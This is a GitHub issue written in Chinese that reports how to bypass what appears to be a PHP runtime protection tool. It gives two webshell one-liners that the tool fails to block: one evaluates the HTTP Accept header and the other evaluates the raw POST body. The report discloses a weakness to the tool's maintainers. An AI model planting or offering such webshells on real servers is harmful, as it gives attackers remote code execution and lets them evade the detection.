Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

php代码执行绕过 #397

Open
5ibug opened this issue Sep 14, 2022 · 1 comment
Open

php代码执行绕过 #397

5ibug opened this issue Sep 14, 2022 · 1 comment

Comments

@5ibug
Copy link

5ibug commented Sep 14, 2022

php eval绕过拦截执行代码

PHP Version 7.2.33

一句话正常被拦截,但是header一句话就可以绕过拦截
<?php eval($_SERVER['HTTP_ACCEPT']); ?>

Status Protected
Version 1.3.7
Build Time 2022-01-28 17:56:21
Commit Id a0634d6
V8 Version 7.8
@5ibug
Copy link
Author

5ibug commented Sep 14, 2022

补一个, 这个也可以
eval(file_get_contents("php://input"));
直接post raw

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant